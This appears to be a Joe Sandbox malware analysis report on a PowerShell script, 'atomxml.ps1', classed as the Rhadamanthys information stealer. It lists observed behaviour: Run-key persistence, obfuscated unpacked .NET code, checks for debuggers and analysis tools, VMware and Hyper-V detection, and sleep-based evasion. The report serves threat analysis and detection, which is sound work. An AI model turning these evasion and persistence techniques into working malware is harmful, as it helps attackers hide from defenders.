Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 17_3_00F720EA push esi; iretd	17_3_00F7213A
Source: C:\Windows\SysWOW64\fontdrvhost.exe	Code function: 17_3_00F74925 push 0000002Eh; iretd	17_3_00F74928

Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, jM6m4u9DWikmOWShtE6.cs	High entropy of concatenated method names: 'S3lt65JOvAkgKQapRSR', 'mmUvE7J1mQoaNh2BJSU', 'LwwkAaysJm', 'bTBIO3JUyMl7KCmcxpW', 'JqG3rIJcxVXkM4J8FBQ', 'kaClBWJynQ24gIiTOE7', 'r4kTF1J0Wc4GRP0nB0b', 'ggwrAkJSIejCKDgJDbO', 'kYRerNJxFOW0qWgSKxg', 'oUdyyxJ2TX4flUBHGQA'
Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, B.cs	High entropy of concatenated method names: 'Main', 'PwoYlYevI', 'KimKarden', 'YV3DtKLh0', 'n5NUogKIH', 'nH7cxHWuZ', 'JrFye4Irj', 'DHA0GCrVK', 'dmGSSOMv3', 'NtGetContextThread'
Source: 0.2.powershell.exe.26c39780000.0.raw.unpack, REGVHS9OeVXhsthj40r.cs	High entropy of concatenated method names: 'sIxKUwyJ2b', 'cGVMb4J8GfKVjTDSFhd', 'DwLdf3J9XExHHVe5TMY', 'QlcG81dBngQ5kD7jVdS', 'VXby9udzv3508LcC2xe', 'xmxCRJJkZoakVLTtHmM', 'vEyseRJRIv8wphecIgO', 'qBaMW4JdDfGnow0aa8i', 'NrsPVmJJVdEjmww5iB3'

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatistarlt-126			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Uplatil-119			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report atomxml.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Rhadamanthys

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
atomxml.ps1

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7960, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7968, type: MEMORYSTR

Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HOOKEXPLORER.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MP.EXEX64DBG.EXEX32DBG.E
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: X64DBG.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FIDDLER.EXE
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDPE.EXEDNSPY.EXEPETOOLS.
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""W
Source: fontdrvhost.exe, 00000010.00000002.2427192473.0000000003D80000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DUMPCAP.EXE

Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 1800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 3560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 5560000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 27A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Memory allocated: 47A0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6496	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3288	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3815
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6011
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5847
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2625

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4628	Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3412	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3980	Thread sleep count: 5847 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172	Thread sleep count: 2625 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\SysWOW64\fontdrvhost.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: Amcache.hve.11.dr	Binary or memory string: VMware
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.11.dr	Binary or memory string: VMware, Inc.
Source: RegSvcs.exe, 00000006.00000002.2389547473.00000000053A0000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: iQemU
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.11.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.11.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.11.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 0000001A.00000002.2982775109.00000260BA890000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.11.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.11.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: mshta.exe, 00000012.00000002.2545012704.00000211C8528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Amcache.hve.11.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.11.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: ModuleAnalysisCache.0.dr	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: Amcache.hve.11.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: Amcache.hve.11.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.11.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.11.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.11.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.11.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.11.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: mshta.exe, 00000012.00000002.2545012704.00000211C8528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\0c91ef
Source: Amcache.hve.11.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.11.dr	Binary or memory string: VMware Virtual RAM
Source: fontdrvhost.exe, 00000010.00000003.2390559087.00000000059A0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: Amcache.hve.11.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.11.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe	Process queried: DebugPort	Jump to behavior